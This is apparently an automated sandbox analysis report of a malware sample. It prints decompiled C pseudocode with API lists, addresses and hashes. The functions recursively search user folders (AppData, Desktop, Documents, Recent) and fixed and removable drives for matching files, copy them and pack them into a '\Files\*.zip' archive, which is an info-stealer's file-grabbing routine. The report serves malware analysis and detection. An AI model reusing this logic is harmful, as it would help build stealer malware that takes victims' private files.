									goto L44;
								}
								 *0x44644c(0);
								E004090C6( &_v276,  &_v1540);
								_pop(_t217);
								 *0x446430();
								_t170 = PathMatchSpecA( &_v1540, _v8140);
								__eflags = _t170;
								if(_t170 == 0) {
									goto L48;
								}
								 *0x4464d4( &_v540, _v8136);
								_push(_t229);
								goto L30;
							} else {
								_t185 = E0041E87C(0, _t227, 0x3e8,  &_v7804, ":",  &_v8156);
								_t232 = _t232 + 0xc;
								_t229 = _t185;
								_v8152 = 0;
								_v8144 = 0;
								if(_a36 != 0 && PathMatchSpecA( &(_v8124.cFileName), "*.lnk") != 0) {
									_v8144 = 1;
									 *0x44644c(0);
									E004090C6( &_v276,  &_v1540);
									_pop(_t217);
									 *0x446430();
								}
								if(_t229 == 0) {
									L27:
									_push(_v8140);
									if(_v8144 == 0) {
										_t187 = PathMatchSpecA( &(_v8124.cFileName));
										__eflags = _t187;
										if(_t187 == 0) {
											goto L48;
										}
										 *0x4464d4( &_v540, _v8136);
										_push(0x43c8e0);
										L36:
										lstrcatA( &_v540, ??);
										lstrcatA( &_v540,  &(_v8124.cFileName));
										 *0x4461f8 =  *0x4461f8 + E00426ED0(E00416388(_t217,  &_v276), _t227, 0x3e8, 0);
										_t119 =  *0x4461ec; // 0x9c40
										__eflags = _t119 -  *0x4461f8; // 0x0
										if(__eflags <= 0) {
											goto L52;
										}
										_t158 = E00409404(_v8132, _t227, 0xc0000000);
										__eflags = _t158;
										if(_t158 == 0) {
											goto L48;
										}
										_push(2);
										_push(0);
										__eflags = _a32;
										if(_a32 == 0) {
											L46:
											_t159 =  &_v540;
											L47:
											_push(_t159);
											E0041CE7C(_v8128);
											_t232 = _t232 + 0xc;
											goto L48;
										}
										_t159 =  &_v276;
										goto L47;
									}
									if(PathMatchSpecA( &_v1540) == 0) {
										goto L48;
									}
									 *0x4464d4( &_v540, _v8136);
									_push(0x43c8e0);
									L30:
									lstrcatA( &_v540, ??);
									lstrcatA( &_v540, PathFindFileNameA( &_v1540));
									 *0x4461f8 =  *0x4461f8 + E00426ED0(E00416388(_t217,  &_v276), _t227, 0x3e8, 0);
									_t119 =  *0x4461ec; // 0x9c40
									_t255 = _t119 -  *0x4461f8; // 0x0
									if(_t255 <= 0) {
										goto L52;
									}
									if(E00409404(_v8132, _t227, 0xc0000000) == 0) {
										goto L48;
									}
									_push(2);
									_push(0);
									if(_a32 == 0) {
										goto L46;
									}
									_t159 =  &_v1540;
									goto L47;
								} else {
									do {
										_push(0);
										_push(_t229);
										_t194 =  &_v1540;
										if(_v8144 == 0) {
											_t194 =  &(_v8124.cFileName);
										}
										_push(_t194);
										if( *0x446398() != 0) {
											_v8152 = 1;
										}
										_t229 = E0041E87C(0, _t227, 0x3e8, 0, ":",  &_v8156);
										_t232 = _t232 + 0xc;
									} while (_t229 != 0);
									if(_v8152 != 0) {
										L48:
										if(_a20 != 0) {
											E0040954D(_t227, _v8128,  &_v2804,  &_v276, _v8140, _a20, _a24, _v8160, _a32, _a36, _a40);
											_t232 = _t232 + 0x28;
										}
										goto L50;
									}
									goto L27;
								}
							}
						}
						_t233 = _t232 - 0x1c;
						_t226 = _t233;
						_v8144 = _t233;
						 *((intOrPtr*)(_t226 + 0x14)) = 0xf;
						 *((intOrPtr*)(_t226 + 0x10)) = 0;
						 *_t226 = 0;
						E00404331(_t226,  &_v276);
						_t208 = E004091E5(0, _t226, 0x3e8, 0x43c8e0, _t240);
						_t232 = _t233 + 0x1c;
						if(_t208 != 0) {
							goto L50;
						}
						goto L9;
					}
					L50:
				} while (FindNextFileA(_v8148,  &_v8124) != 0);
				_t119 = FindClose(_v8148);
				goto L52;
			}



















































                                                                    0x0040954d
                                                                    0x00409555
                                                                    0x0040955a
                                                                    0x00409561
                                                                    0x0040956b
                                                                    0x00409575
                                                                    0x00409578
                                                                    0x0040957e
                                                                    0x00409583
                                                                    0x00409595
                                                                    0x0040959b
                                                                    0x004095a1
                                                                    0x004095a7
                                                                    0x004095be
                                                                    0x004095c4
                                                                    0x004095c9
                                                                    0x004095d1
                                                                    0x004095d1
                                                                    0x004095d3
                                                                    0x004095d4
                                                                    0x004095d4
                                                                    0x004095df
                                                                    0x004095ec
                                                                    0x00409a7c
                                                                    0x00409a8a
                                                                    0x00409a8a
                                                                    0x004095f7
                                                                    0x004095f7
                                                                    0x00409602
                                                                    0x0040960b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00409611
                                                                    0x0040961c
                                                                    0x00409625
                                                                    0x00409651
                                                                    0x00409657
                                                                    0x00409664
                                                                    0x00409678
                                                                    0x0040967e
                                                                    0x00409681
                                                                    0x004096b6
                                                                    0x004096b6
                                                                    0x004096b8
                                                                    0x004096be
                                                                    0x004096be
                                                                    0x004096c0
                                                                    0x004096c1
                                                                    0x004096c1
                                                                    0x004096c4
                                                                    0x004096c6
                                                                    0x004096cc
                                                                    0x004096cc
                                                                    0x004096ce
                                                                    0x004096cf
                                                                    0x004096cf
                                                                    0x004096dd
                                                                    0x004096eb
                                                                    0x004096f2
                                                                    0x00409705
                                                                    0x00409711
                                                                    0x00409717
                                                                    0x004096f4
                                                                    0x004096fa
                                                                    0x00409700
                                                                    0x00409700
                                                                    0x00409720
                                                                    0x0040972a
                                                                    0x00409967
                                                                    0x0040996a
                                                                    0x004099d4
                                                                    0x004099e1
                                                                    0x004099e7
                                                                    0x004099e9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004099f8
                                                                    0x004099fe
                                                                    0x00000000
                                                                    0x004099fe
                                                                    0x00409978
                                                                    0x0040997e
                                                                    0x00409980
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00409983
                                                                    0x00409997
                                                                    0x0040999d
                                                                    0x0040999e
                                                                    0x004099b1
                                                                    0x004099b7
                                                                    0x004099b9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004099c8
                                                                    0x004099ce
                                                                    0x00000000
                                                                    0x00409730
                                                                    0x00409743
                                                                    0x00409748
                                                                    0x0040974b
                                                                    0x0040974d
                                                                    0x00409753
                                                                    0x0040975c
                                                                    0x00409775
                                                                    0x0040977f
                                                                    0x00409793
                                                                    0x00409799
                                                                    0x0040979a
                                                                    0x0040979a
                                                                    0x004097a2
                                                                    0x004097f6
                                                                    0x004097f6
                                                                    0x00409802
                                                                    0x004098c2
                                                                    0x004098c8
                                                                    0x004098ca
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004098dd
                                                                    0x004098e3
                                                                    0x004098e8
                                                                    0x004098ef
                                                                    0x00409903
                                                                    0x0040991e
                                                                    0x00409924
                                                                    0x00409929
                                                                    0x0040992f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00409940
                                                                    0x00409946
                                                                    0x00409948
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040994e
                                                                    0x00409956
                                                                    0x00409957
                                                                    0x0040995a
                                                                    0x00409a04
                                                                    0x00409a04
                                                                    0x00409a0a
                                                                    0x00409a0a
                                                                    0x00409a11
                                                                    0x00409a16
                                                                    0x00000000
                                                                    0x00409a16
                                                                    0x00409960
                                                                    0x00000000
                                                                    0x00409960
                                                                    0x00409817
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040982a
                                                                    0x00409830
                                                                    0x00409835
                                                                    0x0040983c
                                                                    0x00409857
                                                                    0x00409872
                                                                    0x00409878
                                                                    0x0040987d
                                                                    0x00409883
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040989c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004098a2
                                                                    0x004098aa
                                                                    0x004098ae
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004098b4
                                                                    0x00000000
                                                                    0x004097a4
                                                                    0x004097a4
                                                                    0x004097a4
                                                                    0x004097a5
                                                                    0x004097a6
                                                                    0x004097b2
                                                                    0x004097b4
                                                                    0x004097b4
                                                                    0x004097ba
                                                                    0x004097c3
                                                                    0x004097c5
                                                                    0x004097c5
                                                                    0x004097e1
                                                                    0x004097e3
                                                                    0x004097e6
                                                                    0x004097f0
                                                                    0x00409a19
                                                                    0x00409a1c
                                                                    0x00409a4d
                                                                    0x00409a52
                                                                    0x00409a52
                                                                    0x00000000
                                                                    0x00409a1c
                                                                    0x00000000
                                                                    0x004097f0
                                                                    0x004097a2
                                                                    0x0040972a
                                                                    0x00409683
                                                                    0x00409686
                                                                    0x0040968e
                                                                    0x00409694
                                                                    0x0040969b
                                                                    0x0040969f
                                                                    0x004096a1
                                                                    0x004096a6
                                                                    0x004096ab
                                                                    0x004096b0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004096b0
                                                                    0x00409a55
                                                                    0x00409a68
                                                                    0x00409a76
                                                                    0x00000000

                                                                    APIs
                                                                    • wsprintfA.USER32 ref: 004095A1
                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 004095B8
                                                                    • lstrcatA.KERNEL32(?,?), ref: 004095DF
                                                                    • StrCmpCA.SHLWAPI(?,0043EAC4), ref: 00409603
                                                                    • StrCmpCA.SHLWAPI(?,0043EAC8), ref: 0040961D
                                                                    • lstrcpy.KERNEL32(?,?), ref: 00409651
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 00409664
                                                                    • lstrcatA.KERNEL32(?,?), ref: 00409678
                                                                    • StrCmpCA.SHLWAPI(?,0043C8D8), ref: 004096DD
                                                                    • wsprintfA.USER32 ref: 004096FA
                                                                    • wsprintfA.USER32 ref: 00409711
                                                                    • lstrlen.KERNEL32(?), ref: 00409721
                                                                    • _strtok_s.LIBCMT ref: 00409743
                                                                    • PathMatchSpecA.SHLWAPI(?,*.lnk), ref: 0040976A
                                                                    • PathMatchSpecA.SHLWAPI(?,?), ref: 004098C2
                                                                    • lstrcpy.KERNEL32(?,?), ref: 004098DD
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 004098EF
                                                                    • lstrcatA.KERNEL32(?,?), ref: 00409903
                                                                      • Part of subcall function 00416388: CreateFileA.KERNEL32(00409915,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,?,00409915,?), ref: 004163A3
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00409919
                                                                      • Part of subcall function 00409404: GetFileSecurityA.ADVAPI32(?,00000007,00000000,00000000,?), ref: 00409427
                                                                      • Part of subcall function 00409404: GetLastError.KERNEL32(?,00000007,00000000,00000000,?), ref: 00409435
                                                                      • Part of subcall function 00409404: _malloc.LIBCMT ref: 00409447
                                                                      • Part of subcall function 00409404: GetFileSecurityA.ADVAPI32(?,00000007,00000000,?,?), ref: 00409462
                                                                      • Part of subcall function 00409404: GetCurrentProcess.KERNEL32(0002000E,?,?,00000007,00000000,?,?,?,00000007,00000000,00000000,?), ref: 0040947C
                                                                      • Part of subcall function 00409404: OpenProcessToken.ADVAPI32(00000000,?,00000007,00000000,?,?,?,00000007,00000000,00000000,?), ref: 00409483
                                                                      • Part of subcall function 00409404: DuplicateToken.ADVAPI32(?,00000002,?,?,00000007,00000000,?,?,?,00000007,00000000,00000000,?), ref: 0040949D
                                                                      • Part of subcall function 00409404: MapGenericMask.ADVAPI32(?,?,?,00000007,00000000,?,?,?,00000007,00000000,00000000,?), ref: 004094F0
                                                                      • Part of subcall function 00409404: AccessCheck.ADVAPI32(00000000,?,?,00120089,?,00000014,?,?,?,00000007,00000000,?,?,?,00000007,00000000), ref: 00409511
                                                                      • Part of subcall function 00409404: CloseHandle.KERNEL32(?,?,00000007,00000000,?,?,?,00000007,00000000,00000000,?), ref: 00409525
                                                                    • CoInitialize.OLE32 ref: 0040977F
                                                                      • Part of subcall function 004090C6: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00409150
                                                                      • Part of subcall function 004090C6: lstrcpyn.KERNEL32(?,?,00000104), ref: 004091CE
                                                                    • _strtok_s.LIBCMT ref: 004097DC
                                                                    • PathMatchSpecA.SHLWAPI(?,?), ref: 0040980F
                                                                    • lstrcpy.KERNEL32(?,?), ref: 0040982A
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 0040983C
                                                                    • PathFindFileNameA.SHLWAPI(?), ref: 00409849
                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 00409857
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040986D
                                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00409A62
                                                                    • FindClose.KERNEL32(000000FF), ref: 00409A76
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$File$FindPath$MatchSpeclstrcpywsprintf$CloseProcessSecurityTokenUnothrow_t@std@@@__ehfuncinfo$??2@_strtok_s$AccessByteCharCheckCreateCurrentDuplicateErrorFirstGenericHandleInitializeLastMaskMultiNameNextOpenWide_malloclstrcpynlstrlen
                                                                    • String ID: %s\%s$%s\*$*.lnk
                                                                    • API String ID: 3386769076-1856930566
                                                                    • Opcode ID: f457b3f8171ba05844a7d5be14d052b518339aa32272a24b8ecf4cc3eb23f5e7
                                                                    • Instruction ID: 0b638757ecbccf9d3a8f24bd1ab2112c79f99c09bba3d38c3dea7a2e7699b54e
                                                                    • Opcode Fuzzy Hash: f457b3f8171ba05844a7d5be14d052b518339aa32272a24b8ecf4cc3eb23f5e7
                                                                    • Instruction Fuzzy Hash: 02D1207590025EABDF20DF61DC88AEA77BCBB09305F0504BAF509E2191DB349E84CF59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00411DA6 Relevance: 59.7, APIs: 31, Strings: 3, Instructions: 199stringfileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 72%
                                                                    			E00411DA6(void* __ebx, CHAR* __ecx, void* __edx, CHAR* _a4, CHAR* _a8, CHAR* _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v12;
				char _v280;
				char _v544;
				char _v808;
				char _v1072;
				struct _WIN32_FIND_DATAA _v1392;
				void* _v1396;
				CHAR* _v1400;
				CHAR* _v1404;
				CHAR* _v1408;
				CHAR* _v1412;
				void* __edi;
				void* __esi;
				signed int _t58;
				CHAR* _t60;
				int _t65;
				CHAR* _t86;
				void* _t101;
				void* _t115;
				void* _t130;
				void* _t136;
				void* _t142;
				signed int _t145;
				void* _t146;
				void* _t147;
				void* _t149;

				_t142 = __edx;
				_t136 = __ebx;
				_t58 =  *0x443674; // 0x393162b1
				_v12 = _t58 ^ _t145;
				_t60 = _a4;
				_v1404 = __ecx;
				_v1408 = _t60;
				_v1412 = _a8;
				_t139 = _a12;
				_v1400 = _a12;
				wsprintfA( &_v1072, "%s\\*", _t60);
				_t147 = _t146 + 0xc;
				_t65 = FindFirstFileA( &_v1072,  &_v1392);
				_v1396 = _t65;
				if(_t65 != 0xffffffff) {
					do {
						 *((intOrPtr*)(_t136 + 0x1c)) =  *((intOrPtr*)(_t136 + 0x1c)) + 1;
						_push(".");
						_push( &(_v1392.cFileName));
						if( *0x446458() != 0) {
							_push("..");
							_push( &(_v1392.cFileName));
							if( *0x446458() != 0) {
								E00426300( &_v808, 0, 0x104);
								E00426300( &_v280, 0, 0x104);
								_t149 = _t147 + 0x18;
								lstrcatA( &_v808, _v1408);
								lstrcatA( &_v808, 0x43c8e0);
								lstrcatA( &_v808,  &(_v1392.cFileName));
								lstrcatA( &_v280, 0x43c8e0);
								_t86 =  &_v280;
								if(_a16 == 0) {
									_push( *0x446164);
								} else {
									_push( *0x445b2c);
								}
								lstrcatA(_t86, ??);
								lstrcatA( &_v280, 0x43c8e0);
								lstrcatA( &_v280, _v1404);
								lstrcatA( &_v280, 0x43c8e0);
								lstrcatA( &_v280, _v1412);
								lstrcatA( &_v280, 0x43c8e0);
								lstrcatA( &_v280, _v1400);
								_t101 = _a20 - 1;
								if(_t101 == 0) {
									lstrcatA( &_v280, 0x43c8e0);
									_push( *0x445fd4);
									goto L13;
								} else {
									_t130 = _t101 - 1;
									if(_t130 == 0) {
										lstrcatA( &_v280, 0x43c8e0);
										_push( *0x445e54);
										goto L13;
									} else {
										_t157 = _t130 == 1;
										if(_t130 == 1) {
											lstrcatA( &_v280, 0x43c8e0);
											_push( *0x445b64);
											L13:
											lstrcatA( &_v280, ??);
										}
									}
								}
								lstrcatA( &_v280, 0x43c8e0);
								lstrcatA( &_v280,  &(_v1392.cFileName));
								E00426300( &_v544, 0, 0x104);
								lstrcatA( &_v544,  *0x445fe0);
								_t115 = 0x1a;
								lstrcatA( &_v544, E00415EF6(_t115, _t157));
								CopyFileA( &_v808,  &_v544, 1);
								 *0x4461f8 =  *0x4461f8 + E00426ED0(E00416388(_t139,  &_v544), _t142, 0x3e8, 0);
								_t139 =  &_v544;
								E0041CE7C( *((intOrPtr*)(_t136 + 0x20)),  &_v280, 0, 2);
								_t147 = _t149 + 0x18;
								DeleteFileA( &_v544);
							}
						}
					} while (FindNextFileA(_v1396,  &_v1392) != 0);
					_t65 = FindClose(_v1396);
				}
				return E0041DA9B(_t65, _t136, _v12 ^ _t145, _t142, 0x104, 0x43c8e0);
			}





























                                                                    0x00411da6
                                                                    0x00411da6
                                                                    0x00411daf
                                                                    0x00411db6
                                                                    0x00411db9
                                                                    0x00411dbe
                                                                    0x00411dc8
                                                                    0x00411dce
                                                                    0x00411dd4
                                                                    0x00411de3
                                                                    0x00411de9
                                                                    0x00411def
                                                                    0x00411e00
                                                                    0x00411e06
                                                                    0x00411e0f
                                                                    0x00411e1f
                                                                    0x00411e1f
                                                                    0x00411e22
                                                                    0x00411e2d
                                                                    0x00411e36
                                                                    0x00411e3c
                                                                    0x00411e47
                                                                    0x00411e50
                                                                    0x00411e60
                                                                    0x00411e72
                                                                    0x00411e77
                                                                    0x00411e87
                                                                    0x00411e95
                                                                    0x00411ea9
                                                                    0x00411eb7
                                                                    0x00411ec1
                                                                    0x00411ec7
                                                                    0x00411ed1
                                                                    0x00411ec9
                                                                    0x00411ec9
                                                                    0x00411ec9
                                                                    0x00411ed8
                                                                    0x00411ee6
                                                                    0x00411ef9
                                                                    0x00411f07
                                                                    0x00411f1a
                                                                    0x00411f28
                                                                    0x00411f3b
                                                                    0x00411f44
                                                                    0x00411f45
                                                                    0x00411f81
                                                                    0x00411f87
                                                                    0x00000000
                                                                    0x00411f47
                                                                    0x00411f47
                                                                    0x00411f48
                                                                    0x00411f6b
                                                                    0x00411f71
                                                                    0x00000000
                                                                    0x00411f4a
                                                                    0x00411f4a
                                                                    0x00411f4b
                                                                    0x00411f55
                                                                    0x00411f5b
                                                                    0x00411f8d
                                                                    0x00411f94
                                                                    0x00411f94
                                                                    0x00411f4b
                                                                    0x00411f48
                                                                    0x00411fa2
                                                                    0x00411fb6
                                                                    0x00411fc6
                                                                    0x00411fdb
                                                                    0x00411fe3
                                                                    0x00411ff1
                                                                    0x00412007
                                                                    0x00412027
                                                                    0x0041203b
                                                                    0x00412041
                                                                    0x00412046
                                                                    0x00412050
                                                                    0x00412050
                                                                    0x00411e50
                                                                    0x00412069
                                                                    0x00412077
                                                                    0x00412077
                                                                    0x0041208a

                                                                    APIs
                                                                    • wsprintfA.USER32 ref: 00411DE9
                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 00411E00
                                                                    • StrCmpCA.SHLWAPI(?,0043EAC4), ref: 00411E2E
                                                                    • StrCmpCA.SHLWAPI(?,0043EAC8), ref: 00411E48
                                                                    • _memset.LIBCMT ref: 00411E60
                                                                    • _memset.LIBCMT ref: 00411E72
                                                                    • lstrcatA.KERNEL32(?,?), ref: 00411E87
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 00411E95
                                                                    • lstrcatA.KERNEL32(?,?), ref: 00411EA9
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 00411EB7
                                                                    • lstrcatA.KERNEL32(?), ref: 00411ED8
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 00411EE6
                                                                    • lstrcatA.KERNEL32(?,?), ref: 00411EF9
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 00411F07
                                                                    • lstrcatA.KERNEL32(?,?), ref: 00411F1A
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 00411F28
                                                                    • lstrcatA.KERNEL32(?,?), ref: 00411F3B
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 00411F55
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 00411F6B
                                                                    • lstrcatA.KERNEL32(?), ref: 00411F94
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 00411FA2
                                                                    • lstrcatA.KERNEL32(?,?), ref: 00411FB6
                                                                    • _memset.LIBCMT ref: 00411FC6
                                                                    • lstrcatA.KERNEL32(?), ref: 00411FDB
                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 00411FF1
                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 00412007
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00412022
                                                                    • DeleteFileA.KERNEL32(?,000003E8,00000000,?), ref: 00412050
                                                                    • FindNextFileA.KERNEL32(?,?), ref: 00412063
                                                                    • FindClose.KERNEL32(?), ref: 00412077
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$File$Find_memset$CloseCopyDeleteFirstNextUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                                                    • String ID: %s\%s$%s\%s\%s\%s$%s\*
                                                                    • API String ID: 676975003-3933763253
                                                                    • Opcode ID: 622764a1bb231c85d10f08ec52cd615b4dac76b767b50ca0dfd3b657b7b0f6dd
                                                                    • Instruction ID: cf667f2677a2d0d00ce50c166746809aaceeb30a4323bd9a0a3e476e31e91472
                                                                    • Opcode Fuzzy Hash: 622764a1bb231c85d10f08ec52cd615b4dac76b767b50ca0dfd3b657b7b0f6dd
                                                                    • Instruction Fuzzy Hash: C581ECB690011DAFCF109FA0EC49ECEBB7CAB0A755F1104A6F609E2150D734DA89CF69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00409ADF Relevance: 56.3, APIs: 17, Strings: 15, Instructions: 284stringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 35%
                                                                    			E00409ADF(CHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v12;
				char _v120;
				char _v1120;
				char _v2120;
				char _v3120;
				char _v3124;
				intOrPtr* _v3128;
				intOrPtr _v3132;
				intOrPtr _v3136;
				char _v3140;
				char _v3144;
				char _v3148;
				intOrPtr _v3152;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t73;
				char* _t78;
				char* _t79;
				char* _t80;
				void* _t125;
				signed int _t132;
				signed int _t140;
				void* _t141;
				int _t146;
				void* _t151;
				void* _t162;
				void* _t186;
				void* _t194;
				void* _t195;
				CHAR* _t196;
				signed int _t201;
				void* _t203;
				intOrPtr* _t204;
				CHAR* _t205;
				signed int _t206;
				void* _t207;

				_t73 =  *0x443674; // 0x393162b1
				_v12 = _t73 ^ _t206;
				_v3132 = _a8;
				_v3136 = _a16;
				_t196 = __ecx;
				_t162 = 0x3e8;
				_t203 = __edx;
				_v3152 = _a20;
				_t194 = 0x3e8;
				_t78 =  &_v3120;
				do {
					 *_t78 = 0;
					_t78 = _t78 + 1;
					_t194 = _t194 - 1;
				} while (_t194 != 0);
				_t195 = 0x3e8;
				_t79 =  &_v1120;
				do {
					 *_t79 = 0;
					_t79 = _t79 + 1;
					_t195 = _t195 - 1;
				} while (_t195 != 0);
				_t80 =  &_v2120;
				do {
					 *_t80 = 0;
					_t80 = _t80 + 1;
					_t162 = _t162 - 1;
					_t212 = _t162;
				} while (_t162 != 0);
				lstrcatA( &_v3120, "\\Files\\");
				lstrcatA( &_v3120, _t196);
				lstrcatA( &_v3120, ".zip");
				_v3128 = E0041CDBD(0, _t196, _t203, _t206, _t212);
				_v3124 = 0;
				_v3140 = 0;
				 *0x4464d4( &_v1120, E00415E43(_t203, "%APPDATA%"), E00416617(0, _t196, _t203, 0x1a));
				 *0x4464d4( &_v1120, E00415E43( &_v1120, "%LOCALAPPDATA%"), E00416617(0, _t196, _t203, 0x1c));
				 *0x4464d4( &_v1120, E00415E43( &_v1120, "%USERPROFILE%"), E00416617(0, _t196, _t203, 0x28));
				 *0x4464d4( &_v1120, E00415E43( &_v1120, "%DESKTOP%"), E00416617(0, _t196, _t203, 0x10));
				 *0x4464d4( &_v1120, E00415E43( &_v1120, "%DOCUMENTS%"), E00416617(0, _t196, _t203, 5));
				 *0x4464d4( &_v1120, E00415E43( &_v1120, "%PROGRAMFILES%"), E00416617(0, _t196, _t203, 0x26));
				 *0x4464d4( &_v1120, E00415E43( &_v1120, "%PROGRAMFILES_86%"), E00416617(0, _t196, _t203, 0x2a));
				_push(E00416617(0, _t196, _t203, 8));
				_t125 = E00415E43( &_v1120, "%RECENT%");
				_pop(_t186);
				 *0x4464d4( &_v1120, _t125);
				_push(0);
				_push("*%DRIVE_FIXED%*");
				_push( &_v1120);
				if( *0x446398() != 0) {
					_v3124 = 1;
				}
				_push(0);
				_push("*%DRIVE_REMOVABLE%*");
				_push( &_v1120);
				if( *0x446398() != 0) {
					_v3124 = 1;
					_v3140 = 1;
				}
				_t132 =  *0x446398(_t203, "*%RECENT%*", 0);
				asm("sbb edi, edi");
				_t201 =  ~( ~_t132);
				if(_v3124 == 0) {
					E00409A8B(0, _t186, _t201, __eflags, _v3132,  &_v1120, _v3128, _a12, _a4, _v3136, 0, _t201);
					_t207 = _t207 + 0x20;
				} else {
					GetLogicalDriveStringsA(0x64,  &_v120);
					_t205 =  &_v120;
					if(_v120 != 0) {
						do {
							_t146 = GetDriveTypeA(_t205);
							if(_v3140 == 0) {
								L15:
								 *0x4464d4( &_v2120,  &_v1120);
								_push(_t205);
								_push("%DRIVE_FIXED%");
							} else {
								_t218 = _t146 - 2;
								if(_t146 != 2) {
									goto L15;
								} else {
									 *0x4464d4( &_v2120,  &_v1120);
									_push(_t205);
									_push("%DRIVE_REMOVABLE%");
								}
							}
							_t151 = E00415E43( &_v2120);
							_pop(_t186);
							 *0x4464d4( &_v2120, _t151);
							E00409A8B(0, _t186, _t201, _t218, _v3132,  &_v2120, _v3128, _a12, _a4, _v3136, _v3124, _t201);
							_t207 = _t207 + 0x20;
							_t205 =  &(_t205[ *0x446320(_t205) + 1]);
						} while ( *_t205 != 0);
					}
				}
				_t204 = _v3128;
				_t202 =  &_v3148;
				E0041CED3(_t204, _t186,  &_v3148,  &_v3144);
				_t140 = E0041CE7C(_v3152,  &_v3120, _v3144, 3);
				if(_t204 == 0 || (_t140 & 0xffffff00 |  *_t204 == 0x00000001) == 0) {
					_t202 = _t204;
					_t141 = E0041CF3E(_t204);
				} else {
					_t141 = E00408318(_t204, _t204);
				}
				return E0041DA9B(_t141, 0, _v12 ^ _t206, _t195, _t202, _t204);
			}









































                                                                    0x00409ae8
                                                                    0x00409aef
                                                                    0x00409af6
                                                                    0x00409b00
                                                                    0x00409b0a
                                                                    0x00409b0c
                                                                    0x00409b11
                                                                    0x00409b13
                                                                    0x00409b19
                                                                    0x00409b1b
                                                                    0x00409b23
                                                                    0x00409b23
                                                                    0x00409b25
                                                                    0x00409b26
                                                                    0x00409b26
                                                                    0x00409b29
                                                                    0x00409b2b
                                                                    0x00409b31
                                                                    0x00409b31
                                                                    0x00409b33
                                                                    0x00409b34
                                                                    0x00409b34
                                                                    0x00409b37
                                                                    0x00409b3d
                                                                    0x00409b3d
                                                                    0x00409b3f
                                                                    0x00409b40
                                                                    0x00409b40
                                                                    0x00409b40
                                                                    0x00409b4f
                                                                    0x00409b5d
                                                                    0x00409b6f
                                                                    0x00409b7c
                                                                    0x00409b82
                                                                    0x00409b88
                                                                    0x00409bab
                                                                    0x00409bd4
                                                                    0x00409bfd
                                                                    0x00409c26
                                                                    0x00409c4f
                                                                    0x00409c78
                                                                    0x00409ca1
                                                                    0x00409caf
                                                                    0x00409cbb
                                                                    0x00409cc1
                                                                    0x00409cca
                                                                    0x00409cd0
                                                                    0x00409cd1
                                                                    0x00409cdc
                                                                    0x00409ce8
                                                                    0x00409cea
                                                                    0x00409cea
                                                                    0x00409cf0
                                                                    0x00409cf1
                                                                    0x00409cfc
                                                                    0x00409d05
                                                                    0x00409d07
                                                                    0x00409d0d
                                                                    0x00409d0d
                                                                    0x00409d1a
                                                                    0x00409d24
                                                                    0x00409d26
                                                                    0x00409d2e
                                                                    0x00409e15
                                                                    0x00409e1a
                                                                    0x00409d34
                                                                    0x00409d3a
                                                                    0x00409d40
                                                                    0x00409d46
                                                                    0x00409d4c
                                                                    0x00409d4d
                                                                    0x00409d59
                                                                    0x00409d7c
                                                                    0x00409d8a
                                                                    0x00409d90
                                                                    0x00409d91
                                                                    0x00409d5b
                                                                    0x00409d5b
                                                                    0x00409d5e
                                                                    0x00000000
                                                                    0x00409d60
                                                                    0x00409d6e
                                                                    0x00409d74
                                                                    0x00409d75
                                                                    0x00409d75
                                                                    0x00409d5e
                                                                    0x00409d9c
                                                                    0x00409da2
                                                                    0x00409dab
